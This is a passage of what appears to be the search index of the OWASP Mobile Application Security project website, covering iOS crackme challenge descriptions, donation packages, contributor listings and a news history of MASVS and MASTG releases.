"},{"location":"crackmes/iOS/","title":"iOS Crackmes","text":""},{"location":"crackmes/iOS/#ios-uncrackable-l1","title":"iOS UnCrackable L1","text":"A secret string is hidden somewhere in this binary. Find a way to extract it. The app will give you a hint when started.
Download
InstallationOpen the \"Device\" window in Xcode and drag the IPA file into the list below \"Installed Apps\".
Note: The IPA is signed with an Enterprise distribution certificate. You'll need to install the provisioning profile and trust the developer to run the app the \"normal\" way. Alternatively, re-sign the app with your own certificate, or run it on a jailbroken device (you'll want to do one of those anyway to crack it).
SPOILER (Solutions)By Bernhard Mueller
"},{"location":"crackmes/iOS/#ios-uncrackable-l2","title":"iOS UnCrackable L2","text":"This app holds a secret inside - and this time it won't be tampered with!
Hint: it is related to alcoholic beverages.
Download
InstallationOpen the \"Device\" window in Xcode and drag the IPA file into the list below \"Installed Apps\".
Note 1: The IPA is signed with an Enterprise distribution certificate. You'll need to install the provisioning profile and trust the developer to run the app the \"normal\" way. Alternatively, re-sign the app with your own certificate, or run it on a jailbroken device (you'll want to do one of those anyway to crack it).
Note 2: Due to its anti-tampering mechanisms the app won't run correctly if the main executable is modified and/or re-signed.
SPOILER (Solutions)By Bernhard Mueller
"},{"location":"donate/how_to_donate/","title":"How to Donate","text":"1. Make your Donation:
Click the button to make your donation directly in the official OWASP website:
Fill in the form and be sure to select the option \"Publicly list me as a supporter of OWASP Mobile Application Security\"
Make your Donation
2. Register your Donation Package (optional):
If your donation is above USD 500 you may opt-in for a Donation Package by registering it. We will then, together with the OWASP Foundation, verify and process it.
Register your Donation
"},{"location":"donate/packages/","title":"Donation Packages","text":"These types of public recognition shall be online no less than one year, or no less than the next major release, whichever is greater.
The Donation Packages have a maximum duration, once expired the logos will be removed and the donator will still be listed as supporter on the project website, GitHub and in the printed and digital versions. This can be renewed anytime.
Good Samaritan (USD 500) Honorable Benefactor (USD 2,000 / 8 Available) God Mode Donator (USD 4,000 / 5 Available)
Please note that the OWASP Donation Policy has changed since 22-Sept-2020. All details can be found in OWASP Donations Policy page.
Contact us if you have any questions regarding your donation.
"}]} \ No newline at end of file +{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"","title":"OWASP Mobile Application Security","text":""},{"location":"#our-mission","title":"Our MissionOWASP MASVSOWASP MASTGOWASP MAS Checklist","text":"\"Define the industry standard for mobile application security.\"The OWASP Mobile Application Security (MAS) flagship project provides a security standard for mobile apps (OWASP MASVS) and a comprehensive testing guide (OWASP MASTG) that covers the processes, techniques, and tools used during a mobile app security test, as well as an exhaustive set of test cases that enables testers to deliver consistent and complete results.
Download the MASVS Download the MASTG Download the Checklist "},{"location":"#trusted-by","title":"Trusted By","text":"The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions. Learn more.
"},{"location":"#mas-advocates","title":"\ud83e\udd47 MAS Advocates","text":"
MAS Advocates are key industry adopters of the OWASP MASVS and MASTG who have invested a significant and consistent amount of resources to drive the project forward and ensure its continued success. This includes making consistent high-impact contributions and actively promoting the adoption and usage of the project. Learn more.
"},{"location":"contact/","title":"\ud83d\udcac Connect with Us","text":"You can follow and reach out to the OWASP MAS team in many ways.
If you'd like to contribute, take a look at our Contributions page or reach out to the project leaders Carlos or Sven.
Request an invitation to join our Slack channel #project-mobile-app-security
Carlos is a mobile security research engineer who has gained many years of hands-on experience in the field of security testing for mobile apps and embedded systems such as automotive control units and IoT devices. He is passionate about reverse engineering and dynamic instrumentation of mobile apps and is continuously learning and sharing his knowledge.
"},{"location":"contact/#sven-schleier","title":"Sven Schleier","text":"
Sven is an experienced web and mobile penetration tester and assessed everything from historic Flash applications to progressive mobile apps. He is also a security engineer that supported many projects end-to-end during the SDLC to \"build security in\". He was speaking at local and international meetups and conferences and is conducting hands-on workshops about web application and mobile app security.
"},{"location":"contributing/","title":"Contributing to the MAS Project","text":"
First of all, \u2b50 Give us a Star in GitHub!
The MAS project is an open source effort and we welcome all kinds of contributions and feedback.
Help us improve & join our community:
Contribute with content:
Before you start contributing, please check our pages \"How Can You Contribute?\" and \"Getting Started\". If you have any doubts please contact us.
"},{"location":"contributing/#what-not-to-do","title":"\ud83d\udeab What not to do","text":"Although we greatly appreciate any and all contributions to the project, there are a few things that you should take into consideration:
Please be sure to take a careful look at our Code of Conduct for all the details and ask us in case of doubt.
"},{"location":"contributing/#our-contributors","title":"Our Contributors","text":"All of our contributors are listed in GitHub repos. See OWASP MASTG Authors & Co-Authors, MASTG Contributors and MASVS Contributors.
Update March 2023: We're creating a new concept for contributions that aligns with the new MASTG v2 workflows. Stay tuned...
"},{"location":"contributing/#owasp-mas-project-featured-contributions","title":"OWASP MAS Project Featured Contributions","text":"Coming soon...
"},{"location":"contributing/#owasp-mastg-v2","title":"OWASP MASTG V2","text":"Coming soon...
"},{"location":"contributing/#owasp-masvs-v1","title":"OWASP MASVS V1","text":"The latest version of the MASVS v1 including all translations is available here: https://github.com/OWASP/owasp-masvs/releases/tag/v1.5.0
Project Lead Lead Author Contributors and Reviewers Sven Schleier and Carlos Holguera Bernhard Mueller, Sven Schleier, Jeroen Willemsen and Carlos Holguera Alexander Antukh, Mesheryakov Aleksey, Elderov Ali, Bachevsky Artem, Jeroen Beckers, Jon-Anthoney de Boer, Ben Cheney, Will Chilcutt, Stephen Corbiaux, Ratchenko Denis, Ryan Dewhurst, @empty_jack, Ben Gardiner, Manuel Delgado, Anton Glezman, Josh Grossman, Sjoerd Langkemper, Vin\u00edcius Henrique Marangoni, Martin Marsicano, Roberto Martelloni, @PierrickV, Julia Potapenko, Andrew Orobator, Mehrad Rafii, Javier Ruiz, Abhinav Sejpal, Stefaan Seys, Yogesh Sharma, Prabhant Singh, Nikhil Soni, Anant Shrivastava, Francesco Stillavato, Abdessamad Temmar, Pauchard Thomas, Lukasz Wierzbicki Language Translators & Reviewers Brazilian Portuguese Mateus Polastro, Humberto Junior, Rodrigo Araujo, Maur\u00edcio Ariza, Fernando Galves Chinese (Traditonal) Peter Chi, Lex Chien, Henry Hu, Leo Wang Chinese (Simplified) Bob Peng, Harold Zang, Jack S French Romuald Szkudlarek, Abderrahmane Aftahi, Christian Dong (Review) German Rocco Gr\u00e4nitz, Sven Schleier (Review) Hindi Mukesh Sharma, Ritesh Kumar, Kunwar Atul Singh, Parag Dave, Devendra Kumar Sinha, Vikrant Shah Japanese Koki Takeyama, Riotaro Okada (Review) Korean Youngjae Jeon, Jeongwon Cho, Jiyou Han, Jiyeon Sung Persian Hamed Salimian, Ramin Atefinia, Dorna Azhirak, Bardiya Akbari, Mahsa Omidvar, Alireza Mazhari, Milad Khoshdel Portuguese Ana Filipa Mota, Fernando Nogueira, Filipa Gomes, Luis Fontes, S\u00f3nia Dias Russian Gall Maxim, Eugen Martynov, Chelnokov Vladislav, Oprya Egor, Tereshin Dmitry Spanish Martin Marsicano, Carlos Holguera Turkish An\u0131l Ba\u015f, Haktan Emik Greek Panagiotis Yialouris"},{"location":"contributing/#owasp-mastg-v1","title":"OWASP MASTG V1","text":"The latest version of the MASTG v1 is available here: https://github.com/OWASP/owasp-mastg/releases/tag/v1.5.0
Note: This contributor table is generated based on our GitHub contribution statistics. For more information on these stats, see the GitHub Repository README. We manually update the table, so be patient if you're not listed immediately.
We thank our donators for providing the funds to support us on our project activities.
The OWASP Foundation is very grateful for the support by the individuals and organizations listed. However please note, the OWASP Foundation is strictly vendor neutral and does not endorse any of its supporters. Donations do not influence the content of the MASVS or MASTG in any way.
While both the MASVS and the MASTG are created and maintained by the community on a voluntary basis, sometimes a little bit of outside help is required.
Monetary Donations: You can donate any amount you like, no matter how small, anyone can help. From 500$ up you may select a Donation Package and be listed as a donator.
100% of the funds go to the OWASP Foundation and allow us funding our project activities such as contracting technical editors, graphic designers, software developers, purchasing test devices, creating swag, etc.
Donate Purchase the MASTG
Effort Based: You can instead support the project by contributing with your work and end up at our acknowledgement section.
If you're a company, consider becoming a \"MAS Advocate\" which is the highest status that companies can achieve in the project acknowledging that they've gone above and beyond to support the project.
Contribute Become a MAS Advocate
"},{"location":"news/","title":"\ud83d\uddde News","text":"Tip: Follow us on Twitter!
Follow @OWASP_MAS to get the latest updates instantly.
"},{"location":"news/#feb-19th-2024-new-standard-for-secure-mobile-app-transactions-based-on-the-owasp-masvs-by-the-cyber-security-agency-of-singapore","title":"Feb 19th, 2024: New Standard for Secure Mobile App Transactions based on the OWASP MASVS by the Cyber Security Agency of Singapore","text":"The Cyber Security Agency of Singapore (CSA) launched the \"Safe App Standard\" on January 10, 2024. Tailored for local app developers and service providers, this guideline is based on the OWASP Mobile Application Security Verification Standard (MASVS) and focuses on critical areas such as authentication and authorization (MASVS-AUTH), data storage (MASVS-STORAGE), and tamper resistance (MASVS-RESILIENCE). The initiative aims to protect apps from common cyber threats and ensure a safer digital space for users.
While the Safe App Standard is a significant step forward in securing mobile applications, developers are encouraged to consider the full MASVS and select the appropriate MAS profiles for comprehensive protection. This holistic approach to app security ensures that apps go beyond meeting the baseline and are protected against a wider range of cyber threats, providing robust security for end users.
"},{"location":"news/#jan-18th-2024-masvs-v210-release-masvs-privacy","title":"Jan 18th, 2024: MASVS v2.1.0 Release & MASVS-PRIVACY","text":"
We are thrilled to announce the release of the new version of the OWASP Mobile Application Security Verification Standard (MASVS) v2.1.0 including the new MASVS-PRIVACY category and CycloneDX support.
"},{"location":"news/#masvs-privacy","title":"MASVS-PRIVACY","text":"After collecting and processing all feedback from the MASVS-PRIVACY Proposal we're releasing the new MASVS-PRIVACY category.
The main goal of MASVS-PRIVACY is to provide a baseline for user privacy. It is not intended to cover all aspects of user privacy, especially when other standards and regulations such as ENISA or the GDPR already do that. We focus on the app itself, looking at what can be tested using information that's publicly available or found within the app through methods like static or dynamic analysis.
While some associated tests can be automated, others necessitate manual intervention due to the nuanced nature of privacy. For example, if an app collects data that it didn't mention in the app store or its privacy policy, it takes careful manual checking to spot this.
The new controls are:
The MASVS is now available in CycloneDX format (OWASP_MASVS.cdx.json), a widely adopted standard for software bill of materials (SBOM). This format enables easier integration and automation within DevOps pipelines, improving visibility and management of mobile app security. By using CycloneDX, developers and security teams can more efficiently assess, track and comply with MASVS requirements, resulting in more secure mobile applications.
"},{"location":"news/#jan-11th-2024-mobile-application-risk-scoring-qa","title":"Jan 11th, 2024: Mobile Application Risk Scoring Q&A","text":"We've received many comments and excellent questions, which we've compiled and summarized, along with the authors' answers. We'd like to thank everyone who took the time to read the document and especially those who asked valuable questions.
See Mobile Application Risk Scoring Q&A
"},{"location":"news/#oct-10th-2023-masvs-privacy","title":"Oct 10th, 2023: MASVS-PRIVACY","text":"Mobile applications frequently access sensitive user data to deliver their core functionalities. This data ranges from personally identifiable information (PII), health metrics, location data, to device identifiers. Mobile devices are a constant companion to users, always connected, and equipped with numerous sensors\u2014including cameras, microphones, GPS and BLE\u2014that generate data capable of inferring user behavior and even identifying individuals. The landscape is further complicated by advanced tracking techniques, the integration of third-party SDKs, and a heightened awareness of privacy issues among users and regulators. As a response, there's a growing trend towards on-device processing to keep user data localized and more secure.
Today we're excited to announce the release of the new MASVS-PRIVACY, a new MASVS category and MAS profile with focus on privacy. The new profile is designed to help organizations and individuals assess the privacy implications of their mobile applications and make informed decisions.
The new controls are:
The proposal defines the scope of the new MASVS-PRIVACY category and profile, and includes a detailed description of each control, a rationale, and a list of tests. The new profile MAS-P, establishes a baseline for privacy and is intended to work cohesively, and in some cases even overlap, with other OWASP MAS profiles, such as MAS-L1 and MAS-L2, ensuring a holistic approach to both security and privacy.
Call to Action:
We'd be thrilled to hear what you think! Your input is really important to us, and it can make a big difference in shaping the final version of the document. Please take a moment to review it and share your comments, feedback, and ideas.
Review Timeline: until November 30, 2023
Please follow the link here to access the document: https://docs.google.com/document/d/1jq7V9cRureRFF_XT7d_Z9H_SLsaFs43cE50k6zMRu0Q/edit?usp=sharing
"},{"location":"news/#sept-29th-2023-mastg-refactor-part-2-techniques-tools-reference-apps","title":"Sept 29th, 2023: MASTG Refactor Part 2 - Techniques, Tools & Reference Apps","text":"We are thrilled to announce the second phase of the MASTG (Mobile Application Security Testing Guide) refactor. These changes aim to enhance the usability and accessibility of the MASTG.
The primary focus of this new refactor is the reorganization of the MASTG content into different components, each housed in its dedicated section/folder and existing now as individual pages in our website (markdown files with metadata/frontmatter in GitHub):
Tests:
tests/
folder.MASTG-TEST-XXXX
.Techniques:
techniques/
folder.MASTG-TECH-XXXX
.Tools:
tools/
folder.MASTG-TOOL-XXXX
.Apps:
apps/
folder.MASTG-APP-XXXX
.We hope that the revamped structure enables you to navigate the MASTG more efficiently and access the information you need with ease.
"},{"location":"news/#sep-20th-2023-request-for-community-review-new-risk-assessment-formula-for-mobile-applications","title":"Sep 20th, 2023: Request for Community Review: New Risk Assessment Formula for Mobile Applications","text":"We are excited to announce the release of a new collaborative effort between industry, academia, and the OWASP Mobile Application Security (MAS) project. This document introduces a novel formula designed to measure the risk associated with mobile applications.
Document Highlights:
Call to Action:
We invite you to review the document and share your comments, feedback, and suggestions. Your insights are invaluable to us and will contribute significantly to the final version.
Review Timeline: until October 31, 2023
Please follow the link here to access the document: https://docs.google.com/document/d/1dnjXoHpVL5YmZTqVEC9b9JOfu6EzQiizZAHVAeDoIlo/edit?usp=sharing
By collaborating on this initiative, we aim to provide a structured and flexible framework for risk assessment that assists organizations and individuals in making informed security decisions. We look forward to your active participation and valuable feedback!
"},{"location":"news/#jul-28th-2023-mas-testing-profiles-and-mastg-atomic-tests-paving-the-way-for-next-level-mobile-application-security","title":"Jul 28th, 2023: MAS Testing Profiles and MASTG Atomic Tests - Paving the Way for Next-Level Mobile Application Security","text":"The MASTG refactoring is a significant upgrade that addresses some existing challenges and introduces exciting new features. It aims to streamline compliance, simplify testing and improve usability for security testers and other stakeholders.
"},{"location":"news/#mas-testing-profiles","title":"MAS Testing Profiles","text":"As part of the MASVS refactoring, we've replaced the three traditional verification levels (L1, L2, and R) with security testing profiles in the MASTG. These new profiles are designed to enhance our ability to capture various security nuances associated with mobile apps, allowing us to evaluate different situations for the same MASVS control. For instance, in MASVS-STORAGE-1, it's acceptable to store data unencrypted in app internal storage for MAS-L1, but MAS-L2 requires data encryption.
The new MAS Testing Profiles include revamped versions of the traditional levels and one new addition:
Another interesting addition we're exploring for the near future is a 'Privacy' profile, which would focus on tests that consider the privacy implications of various app features and functionalities. We believe that this profile can become an essential tool in an era where privacy has become a significant concern.
HELP WANTED: Today we're releasing the new MAS Testing Profiles and would love to hear what you think. Please give your feedback here until the 31st of August 2023.
"},{"location":"news/#atomic-tests","title":"Atomic Tests","text":"One of the key changes in the MASTG refactoring is the introduction of the new MASTG Atomic Tests. The existing tests are currently quite large and often cover more than one MASVS control. With the introduction of Atomic Tests, we'll break these tests down into smaller, more manageable pieces. Our goal is to make these tests as self-contained and specific as possible to allow for reduced ambiguity, better understanding and easier execution. Each atomic test will have its unique ID for easy reference and traceability and will be mapped to the relevant controls from the MASVS.
But before we can start writing the new atomic tests, we need to finalize the proposal for the new MASTG Atomic Tests including mappings to the MASVS controls and the new MAS Testing profiles.
HELP WANTED: Today we're releasing the new MASTG Atomic Tests Proposal and would love to hear what you think. Please give your feedback here until the 31st of August 2023.
"},{"location":"news/#whats-next","title":"What's Next?","text":"We are now in the process of transforming the MASTG, according to the changes highlighted above. We've already released the MASVS v2.0.0, and the rest of the year will be dedicated to the MASTG refactoring, which will involve creating hundreds of new tests. We believe these changes will significantly improve the usability and relevance of the MASTG. We're excited to keep you updated on our progress and look forward to your continued support and feedback.
We would like to extend a special thanks to our MAS Advocate NowSecure. Their commitment to the OWASP project is not merely financial; it\u2019s an investment of their most valuable resource \u2013 their people and their time. NowSecure has dedicated hours of expertise, extensive knowledge, and hard work towards making these changes a reality.
Would you like to become a MAS Advocate? Contact us to learn more.
A huge thanks goes of course to our wider community and all of our contributors. Your continuous participation and input have been instrumental in the evolution of the OWASP MAS project. It is through this collaborative effort that we can truly advance in the field of mobile app security. Thank you for being a part of this journey!
"},{"location":"news/#may-8th-2023-masvs-v2-colors","title":"May 8th, 2023: MASVS v2 Colors","text":"We're bringing official colors to the MASVS! The new colors will be used across the MASVS v2.0.0 and MASTG v2.0.0 to help users quickly identify the different control groups. We've also revamped certain areas of our website to make them more readable and easier to navigate as well as to prepare for what's coming with the MASTG v2.0.0 (keyword: \"atomic tests\").
"},{"location":"news/#masvs","title":"MASVS","text":"
In the MASVS home page, the new colors will be used to highlight the different control groups.
The individual controls will also be color-coded to help users quickly identify the different control groups. We've also redesigned the control pages to make them more readable and easier to navigate.
"},{"location":"news/#mastg","title":"MASTG","text":"
Now, when you navigate to the MASTG tests, you'll see that they are categorized by platform (Android/iOS) as well as by MASVS category, also using our new colors in the sidebar. The colors will also be used to highlight the different control groups in the test description.
Each test now contains a header section indicating the platform, the MASVS v1.5.0 controls, and the MASVS v2.0.0 controls.
We've also introduced a new section called \"Resources\" which is automatically generated using the inline links within the MASTG pages and serve as a quick reference to the most important resources for each test.
NOTE: The MASTG tests themselves haven't changed yet, we're still working on the refactoring. For now we've simply split the tests into individual pages to make them easier to navigate and reference. This will facilitate the work on the refactoring and the introduction of the new atomic tests.
"},{"location":"news/#mas-checklist","title":"MAS Checklist","text":"The MAS Checklist pages and the MAS checklist itself have also been updated to use the new colors to highlight the different control groups and to make them easier to navigate.
When you click on a MASVS group you'll see a table listing the new MASVS v2.0.0 controls as well as the corresponding MASTG tests (v1.5.0) for both the Android and the iOS platforms.
NOTE: The checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
We hope you like the new colors and the changes we've made to the website. We're looking forward to your feedback! Please use our GitHub Discussions to post any questions or ideas you might have. If you see something wrong please let us know by opening a bug issue.
"},{"location":"news/#april-1st-2023-masvs-v200-release","title":"April 1st, 2023: MASVS v2.0.0 Release","text":"We are thrilled to announce the release of the new version of the OWASP Mobile Application Security Verification Standard (MASVS) v2.0.0. With this update, we have set out to achieve several key objectives to ensure that MASVS remains a leading industry standard for mobile application security.
We believe that these changes will make the OWASP MASVS v2.0.0 an even more valuable resource for developers and security practitioners alike, and we are excited to see how the industry embraces these updates.
The MASVS v2.0.0 was presented at the OWASP AppSec Dublin 2023, you can watch the presentation \u25b6\ufe0f here.
"},{"location":"news/#why-are-there-no-levels-in-the-new-masvs-controls","title":"Why are there no levels in the new MASVS controls?","text":"The Levels you already know (L1, L2 and R) will be fully reviewed and backed up with a corrected and well-documented threat model.
Enter MAS Profiles: We are moving the levels to the MASTG tests so that we can evaluate different situations for the same control (e.g., in MASVS-STORAGE-1, it's OK to store data unencrypted in app internal storage for L1, but L2 requires data encryption). This can lead to different tests depending on the security profile of the application.
"},{"location":"news/#transition-phase","title":"Transition Phase","text":"The MASTG, in its current version v1.5.0, currently still supports the MASVS v1.5.0. Bringing the MASTG to v2.0.0 to be fully compatible with MASVS v2.0.0 will take some time. That's why we need to introduce a \"transition phase\". We're currently mapping all new proposed test cases to the new profiles (at least L1 and L2), so even if the MASTG refactoring is not complete, you'll know what to test for, and you'll be able to find most of the tests already in the MASTG.
We thank everyone that has participated in the MASVS Refactoring. You can access all Discussion and documents for the refactoring here.
You'll notice that we have one new author in the MASVS: Jeroen Beckers
Jeroen is a mobile security lead responsible for quality assurance on mobile security projects and for R&D on all things mobile. Ever since his master's thesis on Android security, Jeroen has been interested in mobile devices and their (in)security. He loves sharing his knowledge with other people, as is demonstrated by his many talks & trainings at colleges, universities, clients and conferences.
\ud83d\udc99 Special thanks to our MAS Advocate, NowSecure, who has once again demonstrated their commitment to the project by continuously supporting it with time/dedicated resources as well as feedback, data and content contributions.
"},{"location":"news/#august-23rd-2022-project-rebranding-to-owasp-mas","title":"August 23rd, 2022: Project Rebranding to OWASP MAS","text":"
Until now our project was called the \"OWASP Mobile Security Testing Guide (MSTG)\" project. Unfortunately, this was a source of confusion since we happen to have a resource with the same name, the OWASP MSTG. Not only that, that name doesn't reflect the full scope and reach of our project. Have you ever wondered why the MSTG is called MSTG and not MASTG? Both documents are about Mobile Application Security and we'd like to make that clear.
Today we are rebranding our project to \u201cOWASP Mobile App Security (MAS)\u201d. The OWASP MAS project includes:
We see MAS reflecting all the consistency, structure and transparency that we\u2019re bringing with our 2.0 versions.
The rebranding will happen gradually so expect changes to be rolled out over the upcoming days/weeks.
"},{"location":"news/#february-7th-2022-nist-800-218-recommendations-for-mitigating-the-risk-of-software-vulnerabilities","title":"February 7th, 2022: NIST 800-218 - Recommendations for Mitigating the Risk of Software Vulnerabilities","text":"We're happy to share the new NIST 800-218 (Feb 2022) mapping to the latest MASVS v1.4.2 (Jan 2022) especially MASVS-ARCH and MASVS-CODE:
\"Secure Software Development Framework (SSDF) v1.1: Recommendations for Mitigating the Risk of Software Vulnerabilities\"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf
"},{"location":"news/#november-17th-2021-from-slack-to-github-discussions","title":"November 17th, 2021: From Slack to GitHub Discussions","text":"Hello everyone,
times change, our project evolves and being able to hear you and discuss with you all is key for the OWASP MSTG project.
TL;DR: we deprecate Slack in favor of GitHub Discussions as our primary communication channel.
https://github.com/OWASP/owasp-mastg/discussions/ https://github.com/OWASP/owasp-masvs/discussions/
"},{"location":"news/#removing-obstacles","title":"Removing obstacles","text":"Until now we've driven all discussion on the MSTG Slack channel, to participate you had to get Slack, find the invite link (hope that it's still valid, else report it), go to our channel and post your question. It could really be a hurdle some times and some questions might be missed, there was also no way to up-vote them or keep track.
All our contributors do have a GitHub account (or should! now you have a reason :) ). So, from today on we move to GitHub discussions and deprecate Slack as the primary communication channel. You can still reach us there for private messages though and we will try to relay the discussions to Slack ASAP, but just as notifications (no Q&A over there).
Discussions provides a place to bring all those conversations together right next to your code. Whether it\u2019s asking questions, sharing announcements, or featuring important information, it\u2019s all in one place and easily accessible to contributors and community members alike.
"},{"location":"news/#separation","title":"Separation","text":"We want to separation regarding actionable things to do (issues) and ideas/proposals (now \"Ideas\" Discussion). Having it all in GitHub makes it sooo much easier for us to manage, reference, etc.
Think of it this way: Discussions are for talking and GitHub Issues are for doing. This helps minimize distractions, keep teams on track, and address topics and questions clearly in a dedicated forum. Plus, you can move seamlessly between the two as well by converting an issue to a discussion and vice versa with a simple click.
"},{"location":"news/#insights","title":"Insights","text":"Soon we will be able to see insights regarding the discussions. You guessed it, we'll take that into account and acknowledge your contribution to the discussions as we do with the content itself. More details on this once we can test the feature.
"},{"location":"news/#roadmap","title":"Roadmap","text":"or:
For this announcement we partially mapped this nice GitHub article to our project (recommended read): https://github.blog/2021-11-10-7-unique-software-collaboration-features-in-github-discussions/
"},{"location":"news/#may-23rd-2020-new-build-system-and-release-upcoming","title":"May 23rd 2020: New build system and release upcoming!","text":"As already shared during the virtual Dutch Chapter meetup: we are going to release a new version of the MSTG soon. We have been quite busy with moving it to the new build system first as the document got too large for our old tooling. This is a great incentive as well to think of how we can make the guide more focused so that the size does not matter ;-)
More news on the new release will follow soon...
"},{"location":"news/#april-10th-2020-stayhome-and-share-your-knowledge","title":"April 10th 2020: #StayHome and share your knowledge!","text":"Hi everybody,
we are all in more or less restrictive lock-down situations, but the guideline is always #StayHome. This is definitely a challenging time for you, but also us. But luckily it was also never easier to collaborate and share, through so many different tools and platforms.
The OWASP Mobile Security Testing Guide (MSTG) project team wants to encourage people to #StayHome and also use this time to share your knowledge with the community. So if you want to either share your knowledge in mobile security or are just keen in doing some research in this area, we have many open issues where we are still looking for volunteers.
If you can close 5 issues that we marked with the tag #StayHome we will sent you in return a hard copy of the OWASP MSTG! We are giving away a total of 5 books on a first come first serve basis.
If you are interested, do the following:
Go through the open issues in our Github repo with the tag #StayHome.
Make a comment on the issue that you would like to take care of, which will be assigned on a first come first serve basis. For any clarifications you can ping either Carlos or Sven in OWASP Slack. If you don't have an account yet, please check here on how to register.
Work on the issue and create a Pull Request (PR). If you are new to Git(hub), check out our contribution guide for further details.
We will review the PR and merge once all comments are addressed/resolved.
Start at 1. :-)
We would love to have you as a contributor. Feel free to share the mail or like our tweet
Stay safe, take care and #StayHome!
Sven, Jeroen and Carlos
"},{"location":"news/#march-17th-2020-international-release-of-masvs-12","title":"March 17th, 2020: International release of MASVS 1.2","text":"A new version of the OWASP Mobile Application Security Standard (MASVS) was released! The MASVS establishes baseline security requirements for mobile apps and summarizes them in one standard. With this new release we achieved a significant alignment and coverage with existing mobile security documents from ENISA, older NIST documents, OWASP Mobile top 10, and others. The new version 1.2 is available in Github Releases: https://github.com/OWASP/owasp-masvs/releases/tag/v1.2. For more details please look into our Release Notes for Version 1.2 and Version 1.2-RC https://github.com/OWASP/owasp-mastg/releases/tag/v1.2.
Thanks to the great support of our community we have now 9 different languages available in total for the MASVS and would like to thank all of our translators for their great work and support throughout:
The MASVS and its translations are available in PDF, Mobile, ePub, docx and you can also read it via Gitbook. See here for details: https://github.com/OWASP/owasp-masvs/releases
The project team (Sven Schleier, Jeroen Willemsen and Carlos Holguera) would like to thank all the contributors, translators and those who build the improved automation around it and all their hard work and support in the last few months! New releases will be much faster thanks to our GitHub actions and Docker containers. Next to that, we are happy to add Korean and Chinese Simplified to our ever growing list of translations! We will finalize the document generation system and then apply the same build system to the Mobile Security Testing Guide (MSTG) in order to speed up the release process and release more frequently.
"},{"location":"news/#october-4th-2019-pre-release-of-masvs-12","title":"October 4th, 2019: Pre-release of MASVS 1.2!","text":"We have a pre-release of MASVS Version 1.2. This will be the reference document for further translations.
"},{"location":"news/#october-2nd-2019-mstg-playground-release","title":"October 2nd, 2019: MSTG Playground Release!","text":"Want more training apps? We hear you! We just released the MSTG-Android-Java & MSTG-Android-Kotlin for Android and the MSTG-JWT app for iOS. Come and check it out at the release page! With special thanks to Sven Schleier (@sushi2k), Wen Bin Kong (@kongwenbin), Nikhil Soni (@nikhil), and Ryan Teoh (@ryantzj).
"},{"location":"news/#october-2nd-2019-mstg-project-joins-hacktoberfest","title":"October 2nd, 2019: MSTG Project joins Hacktoberfest!","text":"We are joining the #hacktoberfest October 2-31. Check out our issues at Github. Register at https://hacktoberfest.digitalocean.com.
"},{"location":"news/#september-17th-2019-xamarin-experiment","title":"September 17th, 2019: Xamarin experiment!","text":"We have launched a react-native experiment based on our compliance checklist. Want to teach others how to validate React Native apps against the MASVS? Check this Google sheet!
"},{"location":"news/#september-6th-2019-flutter-experiment","title":"September 6th, 2019: Flutter experiment!","text":"We have launched a react-native experiment based on our compliance checklist. Want to teach others how to validate React Native apps against the MASVS? Check this Google sheet!
"},{"location":"news/#september-6th-2019-react-native-experiment","title":"September 6th, 2019: React native experiment!","text":"We have launched a react-native experiment based on our compliance checklist. Want to teach others how to validate React Native apps against the MASVS? Check this Google sheet!
"},{"location":"news/#august-29th-2019-carlos-holguera-joins-the-leader-team","title":"August 29th, 2019: Carlos Holguera joins the leader team","text":"We are happy to announce that Carlos Holguera joins us as an official MSTG Author and co-leader! With a team of 3 we hope to march further as that would make our lives easier given that all of this hard work is done by volunteers!
"},{"location":"news/#august-4th-2019-oss-release","title":"August 4th, 2019: OSS Release!","text":"After a lot of work, we finally have a new release of the MSTG! Want to know more? Head over to the Github release page.
"},{"location":"news/#august-2nd-2019-project-promoted-to-flagship-status","title":"August 2nd, 2019: Project promoted to Flagship status!","text":"We have been awarded Flagship status! We are very grateful and excited about this! We could not have done this without our team of awesome volunteers that have committed to the project, wrote issues, and supported us in many other ways. A special thanks goes out to OWASP and especially Harold Blankenship for facilitating us to function as a project and for leading the project review at OWASP Appsec Tel-Aviv! Thank you!
"},{"location":"news/#june-5th-2019-new-release-of-the-masvs","title":"June 5th, 2019: New release of the MASVS","text":"As the summit is progressing, so are we! We have just released a new version of the MASVS (1.1.4). Want to know more? Head over to the Github release page!
"},{"location":"news/#may-21nd-2019-new-release-of-the-mstg","title":"May 21nd, 2019: New release of the MSTG","text":"As part of the preparations for the Open Security Summit, we have released a new version of the MSTG. Want to know more? Head over to the Github release page!
"},{"location":"news/#may-7th-2019-new-release-of-the-mstg","title":"May 7th, 2019: New release of the MSTG","text":"After many changes, we decided it was time to create a new release in order to improve the book version! Want to know more? Head over to the Github release page.
"},{"location":"news/#april-15th-2019-book-version-project-promotion-preparation-for-the-summit","title":"April 15th, 2019: Book version, project promotion & preparation for the summit","text":"Given that most news is already shared via OWASP Slack over the last quarter, we still see that it is good to share a summary of all of the good things outside of Slack using this news section. In this update we have a lot to share! While we started off this year with an improved version of the MASVS and MSTG, things have not been quiet: there has been a huge development in master of the MSTG and many issues have been raised and fixed. In the meantime, we have worked on an actual print of the book! While an early version is available through Hulu (no link supplied, google and buy at your own risk), we are working on making a better version of that book. In the mean time we have filed for a project promotion to Flagship! Next a lot more cool things happened: with the now official publication of NIST Special Publication (SP) 800-163 Revision 1, the MASVS and MSTG are getting more mainstream ;-). The MASVS & MSTG are mentioned in various other upcoming programs/standards/recommendations as well, which is really a recognition of the hard work put in by the community. We are proud to be part of such a great project! Next, we are preparing to join the Open Security Summit again! Already three people will be on site, and at least one remote, but we would love to work with more people at the project again! Want to know more? Please get in touch via Slack and join the #project-mobile-app-security channel or follow us on Twitter.
"},{"location":"news/#january-15th-2019-release-of-improved-checklist","title":"January 15th, 2019: Release of improved checklist","text":"We released a new version of the checklist! This version has adaptable references so that it can be used with newer versions of the MSTG as well. This version is currently available in French and English and we hope to add the Russian, Japanese, German and Spanish version soon! Want to know more? Take a look at our release page!. We would like to thank our volunteers for their effort to deliver these easy to use checklists!
